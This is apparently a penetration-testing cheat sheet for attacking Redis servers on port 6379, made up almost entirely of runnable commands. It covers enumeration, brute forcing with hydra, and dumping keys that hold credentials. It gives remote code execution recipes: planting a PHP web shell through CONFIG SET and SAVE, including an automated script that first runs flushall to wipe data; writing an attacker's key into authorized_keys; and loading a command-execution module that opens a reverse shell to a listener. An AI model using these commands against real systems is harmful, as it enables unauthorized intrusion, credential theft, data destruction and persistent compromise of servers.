6379 - Redis | d4t4s3c hacks & pills

Information

Default Port: 6379

PORT     STATE SERVICE
6379/tcp open  redis                                                                                                       

Enumeration

nc -vn 192.168.1.2 6379
timeout 0.1 bash -c "nc -nv 192.168.1.2 6379"

nmap -p6379 -sS 192.168.1.2
nmap -p6379 -sVC 192.168.1.2
nmap -p6379 --script="redis-info" 192.168.1.2

msf> use auxiliary/scanner/redis/redis_server

Connect

IPv4

# apt-get install redis-tools -y

# guest (no password)
redis-cli                                 # localhost
redis-cli -h 127.0.0.1 -p 1234            # localhost (other port)
redis-cli -h 192.168.1.2                  # remote
redis-cli -h 192.168.1.2 -p 1234          # remote (other port)

# password
redis-cli -h 192.168.1.2                  # interactive mode
192.168.1.2:6379> INFO
NOAUTH Authentication required.
192.168.1.2:6379> AUTH admin1234
OK

redis-cli -h 127.0.0.1 -a admin1234       # one liner

IPv6

redis-cli -h 2a02:2e02:97c0:b500:a00:27ff:fe2f:6a09
redis-cli -h 2a02:2e02:97c0:b500:a00:27ff:fe2f:6a09 -p1234

Usage

PING                                  # check connection
PONG

INFO
CLIENT LIST
CONFIG GET *
CONFIG GET DIR                        # show directory
CONFIG SET DIR "/dev/shm/"            # change directory
SAVE                                  # save changes

MODULE LIST                           # show modules
MODULE LOAD "/dev/shm/module.so"      # load module

system.exec id                        # execute commands with module (module.so)

SELECT 0                              # select database 0
SELECT 1                              # select database 1
SELECT 2                              # select database 2
KEYS *                                # dump database
hits
GET hits                              # dump database hits
MGET peter john ben                   # dumps databases peter john ben

127.0.0.1:6379> KEYS *
1) "secret"
127.0.0.1:6379> GET "secret"
"ben:Password123"

Brute Force

hydra -t 64 redis://192.168.1.2 -P rockyou.txt            # default port
hydra -t 64 redis://192.168.1.2:1234 -P rockyou.txt       # other port

nmap -p6379 --script="redis-brute" 192.168.1.2

RCE

HTTP

Manual

redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /var/www/html
OK
192.168.1.2:6379> config set dbfilename cmd.php
OK
192.168.1.2:6379> set cmd "<?php system($_GET['cmd']); ?>"
OK
192.168.1.2:6379> save
OK

Auto

#!/bin/bash

# apt install -y redis-tools

rhost="192.168.1.2"   # CHANGE THIS
rport="6379"          # CHANGE THIS

redis-cli -h ${rhost} -p ${rport} flushall
sleep 0.3
echo '<?php system($_GET["cmd"]); ?>' | redis-cli -h ${rhost} -p ${rport} -x set cmd
sleep 0.3
redis-cli -h ${rhost} -p ${rport} config set dir "/var/www/html"
sleep 0.3
redis-cli -h ${rhost} -p ${rport} config set dbfilename "cmd.php"
sleep 0.3
redis-cli -h ${rhost} -p ${rport} save
sleep 0.3
exit 0

SSH

cd /root/.ssh
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 192.168.1.2 -x set ssh_key

redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /home/d4t4s3c/.ssh/
OK
192.168.1.2:6379> config set dbfilename "authorized_keys"
OK
192.168.1.2:6379> save
OK

Module

https://github.com/n0b0dyCN/RedisModules-ExecuteCommand

# attacker
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
cd RedisModules-ExecuteCommand
make
# upload module.os to victim

MODULE LIST                       # list modules
MODULE LOAD /srf/ftp/module.so    # load module.so

192.168.1.95:6379> system.exec id
"uid=1000(ben) gid=1000(ben) grupos=1000(ben)\n"

nc -lvnp 443
192.168.1.95:6379> system.rev 192.168.1.10 443